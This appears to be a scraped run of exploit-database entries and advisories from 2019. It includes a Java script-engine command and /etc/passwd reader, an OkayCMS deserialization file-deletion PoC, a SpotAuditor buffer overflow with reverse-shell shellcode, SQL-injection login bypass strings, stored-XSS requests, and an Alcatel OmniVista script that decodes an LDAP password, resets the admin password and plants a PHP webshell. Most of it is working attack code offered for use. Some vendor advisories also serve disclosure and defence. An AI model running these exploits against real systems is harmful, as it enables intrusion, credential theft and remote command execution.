  var stdInput = new BufferedReader( new InputStreamReader( p.getInputStream() ) );
  var s;
  while (( s = stdInput.readLine()) != null) {
   result.push(s);
  }

  return result;

   };

   return { init: init };
})();

const context = app.init();
```

9b. Following PoC can be used for reading files such as /etc/passwd or /etc/shadow:

```
const app = (() => {
'use strict';

   importPackage(java.io);
   importPackage(java.lang);

   const init = () => {
    var result = [];
      var file = new File('/etc/passwd');
    var br = new BufferedReader(new FileReader(file));

    var st;
      while ((st = br.readLine()) != null) {
        result.push(st);
      }

      return result;
   };

   return { init: init };
})();

const context = app.init();
```

10. Enter the following Velocity code:

```
<hr>
<h2>
   Script output:
</h2>

<h3>
   As List:
</h3>
<ul>
#foreach( $c in $context )
<li>$c</li>

# Unauthenticated remote code execution in OkayCMS

## Overview
* Identifier: AIT-SA-20191129-01
* Target: OkayCMS
* Vendor: OkayCMS
* Version: all versions including 2.3.4
* CVE: CVE-2019-16885
* Accessibility: Local
* Severity: Critical
* Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)

## Summary
[OkayCMS is a simple and functional content managment system for an online store.](https://okay-cms.com)

## Vulnerability Description
An unauthenticated attacker can upload a webshell by injecting a malicious php-object via a crafted cookie. This could happen at two places. First in "view/ProductsView.php" using the cookie "price_filter" or in "api/Comparison.php" via the cookie "comparison". Both cookies will pass untrusted values to a unserialize()-function. The following code shows the vulnerability in "api/Comparison.php":

```
$items = !empty($_COOKIE['comparison']) ? unserialize($_COOKIE['comparison']) : array();
```

The unsafe deserialization also occurs in "view/ProductsView.php":

```
$price_filter = unserialize($_COOKIE['price_filter']);
```


## Proof of Concept
The following code utilizes an object of the smarty-component to delete arbitrary files from the webhost:

```
<?php

if($argc != 3)
{
  print "usage: $argv[0] <url> <file>\n";
  exit(1);
}

$url = $argv[1];
$file = $argv[2];

class Smarty_Internal_CacheResource_File {

        public function releaseLock(Smarty $smarty, Smarty_Template_Cached $cached) {
            $cached->is_locked = false;
            @unlink($cached->lock_id);
        }
}

class Smarty_Template_Cached {
    public $handler = null;
    public $is_locked = true;
    public $lock_id = "";

    public function __construct() {
       $this->lock_id = $GLOBALS['file'];
       $this->handler = new Smarty_Internal_CacheResource_File;
    }
}


class Smarty {
    public $cache_locking = true;
}

class Smarty_Internal_Template  {
    public $smarty = null;
    public $cached = null;

    public function __construct() {
        $this->smarty = new Smarty;
        $this->cached = new Smarty_Template_Cached;
    }

    public function __destruct(){
        if ($this->smarty->cache_locking && isset($this->cached) && $this->cached->is_locked) {
            $this->cached->handler->releaseLock($this->smarty, $this->cached);
        }
    }
}

$obj = new Smarty_Internal_Template();

$serialized = serialize($obj);

$un = unserialize($serialized);

$headers = [
'Accept-Language: en-US,en;q=0.5',
"Referer: $url/en/catalog/myagkie-igrushki",
'Cookie: ' . 'price_filter=' . urlencode($serialized) . ';'
];

$curl = curl_init();
curl_setopt_array($curl, [
    CURLOPT_HTTPHEADER => $headers,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_URL => "$url/en/catalog/myagkie-igrushki/sort-price",
    CURLOPT_USERAGENT => 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0'
]);
$resp = curl_exec($curl);
if(curl_error($curl)) {
   print curl_error($curl);
}
curl_close($curl);


print $resp;

?>
```

## Notes
Because of the high severity of this vulnerability we will not release a full exploit for the remote code execution.

## Vulnerable Versions
 versions of the “Lite”-branch including 2.3.4. Pro Versions prior 3.0.2 might have been affected too.

## Tested Versions
OkayCMS-Lite 2.3.4

## Impact
An unauthenticated attacker could upload a webshell to the server and execute commands remotely.

## Mitigation
At the moment of this publication the vendor has only patched the paid version of the CMS, so a change to other free software or an upgrade to the Pro version of OkayCMS is recommended.

## References:
*  https://nvd.nist.gov/vuln/detail/CVE-2019-16885

## Vendor Contact Timeline

* `2019-08-29` Contacting the vendor
* `2019-09-04` Vendor replied
* `2019-09-17` Vendor released commercial version 3.0.2 including a bugfix
* `2019-09-29` Public disclosure

## Advisory URL
[https://www.ait.ac.at/ait-sa-20191129-01-unauthenticated-remote-code-execution-okaycms](https://www.ait.ac.at/ait-sa-20191129-01-unauthenticated-remote-code-execution-okaycms)

# Exploit Title: SpotAuditor 5.3.2 - 'Base64' Local Buffer Overflow (SEH)
# Exploit Author: Kirill Nikolaev
# Date: 2019-12-06
# Vulnerable Software: SpotAuditor
# Vendor Homepage: http://www.nsauditor.com/
# Version: 5.3.2
# Software Link: http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe
# Tested Windows 7 SP1 x86

# PoC
# 1. Download and install SpotAuditor
# 2. Change shellcode in python script to yours
# 3. Generate payload with python script
# 4. Run the software "Tools -> Base64 Encrypted Password
# 5. Take a shell
# Original DOS exploit https://www.exploit-db.com/exploits/47719

#!/usr/bin/env python

import base64
print ("[+] Thank you for choosing our company")
print ("[+] Local Buffer Overflow (SEH) in SpotAuditor 5.3.2")
print ("[+] Created By Kirill Nikolaev")
print ("[+] Generate payload,check, that you take your shellcode")
print ("")
head='A'*1024
#eb0c-jmp across a few bytes with seh address
jmp_across='\x41\x41\xeb\x0c'
#0x61e0b194 : pop ebx # pop ebp # ret  |  {PAGE_EXECUTE_READ} [sqlite3.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.15.2 (C:\Program Files\Nsasoft\SpotAuditor\sqlite3.dll)
seh='\x94\xb1\xe0\x61'
header_for_shellcode='\x41'*10
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.58.1 LPORT=4444 -f py EXITFUNC=thread -b '\x00'
buf = ""
buf += b"\xbd\x7a\xfe\x84\xdd\xdb\xc9\xd9\x74\x24\xf4\x58\x31"
buf += b"\xc9\xb1\x52\x83\xe8\xfc\x31\x68\x0e\x03\x12\xf0\x66"
buf += b"\x28\x1e\xe4\xe5\xd3\xde\xf5\x89\x5a\x3b\xc4\x89\x39"
buf += b"\x48\x77\x3a\x49\x1c\x74\xb1\x1f\xb4\x0f\xb7\xb7\xbb"
buf += b"\xb8\x72\xee\xf2\x39\x2e\xd2\x95\xb9\x2d\x07\x75\x83"
buf += b"\xfd\x5a\x74\xc4\xe0\x97\x24\x9d\x6f\x05\xd8\xaa\x3a"
buf += b"\x96\x53\xe0\xab\x9e\x80\xb1\xca\x8f\x17\xc9\x94\x0f"
buf += b"\x96\x1e\xad\x19\x80\x43\x88\xd0\x3b\xb7\x66\xe3\xed"
buf += b"\x89\x87\x48\xd0\x25\x7a\x90\x15\x81\x65\xe7\x6f\xf1"
buf += b"\x18\xf0\xb4\x8b\xc6\x75\x2e\x2b\x8c\x2e\x8a\xcd\x41"
buf += b"\xa8\x59\xc1\x2e\xbe\x05\xc6\xb1\x13\x3e\xf2\x3a\x92"
buf += b"\x90\x72\x78\xb1\x34\xde\xda\xd8\x6d\xba\x8d\xe5\x6d"
buf += b"\x65\x71\x40\xe6\x88\x66\xf9\xa5\xc4\x4b\x30\x55\x15"
buf += b"\xc4\x43\x26\x27\x4b\xf8\xa0\x0b\x04\x26\x37\x6b\x3f"
buf += b"\x9e\xa7\x92\xc0\xdf\xee\x50\x94\x8f\x98\x71\x95\x5b"
buf += b"\x58\x7d\x40\xcb\x08\xd1\x3b\xac\xf8\x91\xeb\x44\x12"
buf += b"\x1e\xd3\x75\x1d\xf4\x7c\x1f\xe4\x9f\x42\x48\xdc\x5e"
buf += b"\x2b\x8b\x20\x70\xf7\x02\xc6\x18\x17\x43\x51\xb5\x8e"
buf += b"\xce\x29\x24\x4e\xc5\x54\x66\xc4\xea\xa9\x29\x2d\x86"
buf += b"\xb9\xde\xdd\xdd\xe3\x49\xe1\xcb\x8b\x16\x70\x90\x4b"
buf += b"\x50\x69\x0f\x1c\x35\x5f\x46\xc8\xab\xc6\xf0\xee\x31"
buf += b"\x9e\x3b\xaa\xed\x63\xc5\x33\x63\xdf\xe1\x23\xbd\xe0"
buf += b"\xad\x17\x11\xb7\x7b\xc1\xd7\x61\xca\xbb\x81\xde\x84"
buf += b"\x2b\x57\x2d\x17\x2d\x58\x78\xe1\xd1\xe9\xd5\xb4\xee"
buf += b"\xc6\xb1\x30\x97\x3a\x22\xbe\x42\xff\x42\x5d\x46\x0a"
buf += b"\xeb\xf8\x03\xb7\x76\xfb\xfe\xf4\x8e\x78\x0a\x85\x74"
buf += b"\x60\x7f\x80\x31\x26\x6c\xf8\x2a\xc3\x92\xaf\x4b\xc6"
tail='B'*(5000-1028-4-10-len(buf))
shellcode=head+jmp_across+seh+header_for_shellcode+buf
print (base64.b64encode(shellcode))


--
Best regards,
Kirill Nikolaev
Penetration Tester

# Exploit Title: PRO-7070 Hazır Profesyonel Web Sitesi 1.0 - Authentication Bypass
# Date: 2019-12-08
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.websitem.biz/hazir-site/pro-7070-hazir-mobil-tablet-uyumlu-web-sitesi
# Tested on: Kali Linux
# Version: 1.0
# CVE: N/A

----- PoC: Authentication Bypass -----

Administration Panel: http://localhost/[PATH]/yonetim/pass.asp
Username: '=''or'
Password: '=''or'

# Exploit Title: Snipe-IT Open Source Asset Management 4.7.5 - Persistent Cross-Site Scripting
# Exploit Author: Metin Yunus Kandemir (kandemir)
# Vendor Homepage: https://snipeitapp.com/
# Software Link: https://github.com/snipe/snipe-it/releases/tag/v4.7.5
# Version: 4.7.5
# Category: Webapps
# Tested on: Xampp for Windows

# Description:
# Snipe-IT v4.7.5 has persistent cross-site scripting vulnerability via uploading svg file in accessories section.
# A malicious authorized user could potentially upload an SVG with a javascript payload.

#Steps to Reproduce:

Upload crafted SVG file when sent request to create accessory.
Click created accessory and copy uploaded file location.
Browse uploaded SVG file location on browser.
The alert box will be opened.

#(PoC) Post Request:

POST /accessories HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://target/accessories/create
Content-Type: multipart/form-data; boundary=---------------------------6547029722068941066578895105
Content-Length: 1761
Cookie: XSRF-TOKEN=eyJpdiI6Ikh1TURMRnpyVDJsaVh4WUI5MWtQWnc9PSIsInZhbHVlIjoiUUNOcVErbFpcL0hGbmVveU9wYzZlOWRrVXNBbWxqeDBQZ3drbW4yZ2RXWU1POGlQQnVOeG5EcThxaUUraGdSYmlCMmNIc2VMMERxYnJOWDRBRUhmdEx3PT0iLCJtYWMiOiI2ZTg5YTA2MmUxZWRmM2RjYTNmNzI4YTE0YTQyOTQ4MGEzMDYyYWJiMDk5NGYwOWE4M2Y4ZTc4MWMxYzJhOGY1In0%3D; snipeitv4_session=KvsAzbhBKlUwbijPmLc86vCgO0PhG67J6EIIR0MD; laravel_token=eyJpdiI6InRTXC83Qmx0aDdVTE9EbVJzSnJ4V01nPT0iLCJ2YWx1ZSI6InVITklNQ3h3WldXMFIzY01Ob0Zqb1wvdm1NQTZXN3JuXC9Nc0g5Z0lpWXZCaTdiVHFOUVB4ZkpmQWRrVk1ZWVZFN1dZVnRrM3pRdjRCcWxySDRtd3hEWlIxd0h5QThUMDAyaVJcL0YzTmhFMlVlNzVFSG95S2VVYVBiRzNzNUtIOTkwdlBWUmQ1K3dTZHNNeXZJWVNmaWczb2hyOGFWRmI1a1NiNk84a1wvOW1tWXpleTMzSnRwYlowenBHSzN4dHRzd2lUTXd1b1dLNkluMEt2bWE0M1J4UTBaNGMzTGFQWEVOWnNyQk1aQk1nQ0tBejVjUU9XRnc5Q0l0citqSnJlbzgwTEVWQlN5ekdZa2hYckQ5T1ZKc2E2UT09IiwibWFjIjoiZDZhNWE2NjFmOTMwOWI0N2E2NjE3YTQwNWFlYjg0MmMyYTkwYzE1YTc4ZWI3N2U1ZWFjNGIyMzM4ZWU2NjczMyJ9
Connection: close
Upgrade-Insecure-Requests: 1

.
..
snip
..
.

Content-Disposition: form-data; name="image"; filename="test.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN""http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(1);
</script>
</svg>

-----------------------------6547029722068941066578895105--

# Exploit Title: Alcatel-Lucent Omnivista 8770 - Remote Code Execution
# Google Dork: inurl:php-bin/webclient.php
# Date: 2019-12-01
# Author: 0x1911
# Vendor Homepage: https://www.al-enterprise.com/
# Software Link: https://www.al-enterprise.com/en/products/communications-management-security/omnivista-8770-network-management-system
# Version: All versions, still unpatched
# Tested on: Windows 2003/2008
# CVE : 0day

# Exploit attached, also available here https://git.lsd.cat/g/omnivista-rce/src/master/omnivista.py
# Full writeup at https://git.lsd.cat/g/omnivista-rce/src/master/README.md


'''
Original url: https://git.lsd.cat/g/omnivista-rce
Website: https://lsd.cat
'''
import requests
import socket
import ldap
import sys
from urllib.parse import urlparse
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

class OmniVista:
  def __init__(self, host):
    self.host = host
    self.addr = (urlparse(self.host).hostname)
    self.folders = ['php-bin/', 'soap-bin/', 'bin/', 'data/', 'Themes/', 'log/']
    self.filename = "poc.php"
    self.webshell = "<?php system($_REQUEST[0]) ?>"

  def identify(self):
    r = requests.get(self.host + 'php-bin/Webclient.php', verify=False)
    if '8770' in r.text:
      return 8770
    elif '4760' in r.text:
      return 4760
    else:
      return False

  def checkldap(self):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(10)
    result = s.connect_ex((self.addr, 389))
    if result == 0:
      return True

  def info(self):
    r = requests.post(self.host + 'php-bin/info.php', data={"void": "phDPhd"}, verify=False)
    if 'PHP Version' in r.text:
      return r.text
    else:
      return False

  def getpassword(self):
    r = requests.get(self.host + 'php-bin/Webclient.php', verify=False)
    id = r.headers['Set-Cookie'].split(";")[0].split("=")[1]
    r = requests.get(self.host + 'sessions/sess_' + id, verify=False)
    lenght = int(r.text.split("ldapSuPass")[1][3:5])
    password = r.text.split("ldapSuPass")[1][7:7+lenght]
    return password

  def decodepassword(self, password):
    counter = 0
    key = 16
    cleartext = ""
    if password[0:5] == "{NMC}":
      password = password[5:]
    else:
      return False
    for char in password:
      if 32 <= ord(char):
        char = chr(ord(char) ^ key)
        cleartext += char
      else:
        cleartext += char
      if ord(char) != 0:
        key = counter * ord(char) % 255 >> 3
      else:
        key = 16
      counter += 1
    return cleartext

  def connectldap(self):
    connect = ldap.initialize('ldap://' + self.addr)
    connect.set_option(ldap.OPT_REFERRALS, 0)
    connect.simple_bind_s(self.username, self.password)
    result = connect.search_s('o=nmc', ldap.SCOPE_SUBTREE, '(cn=AdminNmc)')
    print('[*] Current AdminNmc password: ' + str(result[0][1]['userpassword'][0]))
    self.bind = connect
    return True

  def editadminpassword(self):
    self.adminusername = "AdminNmc"
    self.adminpassword = "Lsdcat_exploit1!"
    self.bind.modify_s("uid=AdminNmc,cn=Administrators,cn=8770 administration,o=nmc", [(ldap.MOD_REPLACE, 'userpassword', self.adminpassword.encode('utf-8') )])
    return True

  def login(self):
    self.session = requests.session()
    r = self.session.post(self.host + 'php-bin/webclient.php', data = {"action": "loginCheck", "userLogin": self.adminusername, "userPass": self.adminpassword }, verify = False)
    if 'Directory license is required!' in r.text:
      return False
    else:
      return True

  def exploit8770(self):
    r = self.session.get(self.host + 'php-bin/webclient.php', params = {'action': 'editTheme', 'themeId': "2"}, verify=False)
    r = self.session.post(self.host + 'php-bin/webclient.php',
      data = {"action": "saveTheme", "themeId": "2"},
      files = { "BgImg1": (self.filename, self.webshell, "image/png")},
      verify = False)
    if 'success' in r.text:
      return True

  def exec8770(self):
    return requests.post(self.host + 'Theme2/' + 'poc.php', data = {"0": cmd}, verify=False).text

  def exploit4760(self):
    for folder in self.folders:
      r = requests.post(self.host + 'php-bin/webclient.php',
        data = {"action": "saveTheme", "themeId": "5/../../{}".format(folder), "themeDate": ""},
        files = { "BgImg1": (self.filename, self.webshell, "image/png")},
      verify=False)
      if 'success' in r.text:
        self.folder = folder
        return True

  def exec4760(self, cmd):
    return requests.post(self.host + self.folder + 'poc.php', data = {"0": cmd}, verify=False).text

  def autoexploit(self):
    print('[*] Attempting to exploit on {}'.format(self.host))
    self.model = self.identify()
    if self.model == 4760:
      print('[*] Model is {}'.format(str(self.model)))
      self.exploit4760()
      print('[*] Upload folder is {}'.format(self.folder))
      output = self.exec4760("whoami")
      print('[*] Webshell at {}{}{}'.format(self.host, self.folder, self.filename))
      print('[*] Command output: '.format(output))
    elif self.model == 8770:
      print('[*] Model is {}'.format(str(self.model)))
      self.username = "cn=Directory Manager"
      self.password = self.decodepassword(self.getpassword())
      print('[*] {} password is "{}"'.format(self.username, self.password))
      if self.checkldap():
        print('[*] LDAP Service is accessible!')
        self.connectldap()
        print('[*] Changing AdminNmc password')
        self.editadminpassword()
        print('[*] Logging in')
        if self.login():
          self.exploit8770()
          output = self.exec8770("whoami")
          print('[*] Webshell at {}{}{}'.format(self.host, "themes/Theme2/", self.filename))
          print('[*] Command output: '.format(output))
        else:
          print("[x] Directory license not installed :/")
          return False
      else:
        print("[x] LDAP Service is not directly accessible")
        return False

    else:
      print("[x] Target is not an OmniVista 4760/8770")
      return False

if len(sys.argv) != 2:
  print("Usage: ./omnivista.py http(s)://target.tld:port/")
else:
  exploit = OmniVista(sys.argv[1])
  exploit.autoexploit()

# Exploit Title : Oracle Siebel Sales 8.1 - Persistent Cross-Site Scripting
# Exploit Author : omurugur
# Software link: https://www.oracle.com/tr/applications/siebel/
# Effective version : Oracle Siebel Sales 8.1
# CVE: N/A

# Examples Request;

POST /salesADMIN_trk/start.swe HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64;
Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729;
.NET CLR 3.5.30729)
Host: X.X.X.X
Content-Length: 550
Pragma: no-cache
Cookie: SWEUAID=23; _sn=**-yVfB7JyKox4txS.fQJdh6us-fIdUQaQW0.oxIhK
Connection: close

s_1_1_26_0=&SWEVI=&SWERowId=1-5VWLXT4&SWEC=39&s_1_1_28_0=&SWEMethod=PostChanges&s_1_1_18_0=12/9/2019&SWEPOC=Account&SWEReqRowId=1&SWERPC=1&s_1_1_90_0=N&s_1_1_71_0=&s_1_1_72_0=&s_1_1_83_0=<IFRAME
SRC="javascript:alert('XSS');"></IFRAME>&SWEApplet=Revenue%20Analysis%20Form%20Applet&SWEActiveApplet=Revenue%20Analysis%20Form%20Applet&s_1_1_51_0=%240.00&SWEView=Revenue%20Analysis%20View&SWECmd=InvokeMethod&s_1_1_65_0=&s_1_1_21_0=%240.00&s_1_1_55_0=SADMIN&SWETS=1575878518105&SWEActiveView=Revenue%20Analysis%20View&s_1_1_89_0=&s_1_1_78_0=%240.00&SWEP=&s_1_1_36_0=N&s_1_1_14_0=0.000000&SWERowIds=

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2019-045 
Product: "Scoutnet Kalender" for WordPress
Manufacturer: Scoutnet and Björn Stromberg
Affected Version(s): 1.1.0
Tested Version(s): 1.1.0
Vulnerability Type: Cross-Site Scripting (CWE-79) 
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2019-10-23
Solution Date: -
Public Disclosure: 2019-12-09
CVE Reference: CVE-2019-19198
Author of Advisory: Simon Moser, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

"Scoutnet Kalender" is a plug-in for WordPress to display one oder many
Scoutnet calendars as a widget, on a page or an article.

Due to a missing input sanitation, it is vulnerable to cross-site scripting.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The plug-in allows to include calendars from Scoutnet into WordPress websites.
Calendars are not only included by websites administrated by the same person
as the calendar but also by other sites. When events from a calendar are
included, the data is not being sanitized. This allows an attacker with control
over an embedded calendar to inject scripts into the attacked site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

1. Create an event with the following value of the "Info" field:
<script>alert("Cross-Site Scripting");</script>

2. Save the event

3. Visit the page where the calendar is embedded

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

As long as the default template is not changed by the manufacturer, SySS GmbH
recommends to change the provided template to sanitize fields controlled by
other users. If this is not possible because interactive content needs to be
included, the set of users with permissions to create and change events should
be as small as possible.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2019-10-20: Vulnerability discovered
2019-10-23: Vulnerability reported to manufacturer
2019-11-12: Discussion with the manufacturer about security by design
2019-12-09: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for "Scoutnet Kalender"
    https://de.wordpress.org/plugins/scoutnet-kalender/
[2] SySS Security Advisory SYSS-2019-045
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-045.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Simon Moser of SySS
GmbH.

E-Mail: simon.moser@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Simon_Moser.asc
Key ID: 0x5FF2CFC6
Key Fingerprint: E3C2 A86E 530D 8BD3 C40B 6542 8376 5B89 5FF2 CFC6 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQEzBAEBCgAdFiEE48KoblMNi9PEC2VCg3ZbiV/yz8YFAl3uaEsACgkQg3ZbiV/y
z8ZXmwf/fB1xUfu/2CbUGnq08H6QC2zYdh+ZVCM3EY2WkIQSfw1S2So1iRivnL2a
ZBx7oH1gM/4ynL+1H9JDvwYoePLDpSDK6wPdtxqMtllJsJkE6lgBWe8eHsLKs1QY
IZbyurXNJoZVZjULnZgP+3z3d/tCeua7PWTu/txvslQkWKj7OKtOEb1nK9FkJlax
Xej8eWRcikhl+JV3HLLSG23woLP852eh5mWYUu73ex5YU4J3a111GJOW2b6QImzn
f9LYvP/hsyXClr1B3bK51JUcUZzkz1motozB2gHwBJoi80WWR/zKTnvoMnYcXgDs
DKuo4rnpCRxaPqJPUke8snVqMHSTqQ==
=LPsA
-----END PGP SIGNATURE-----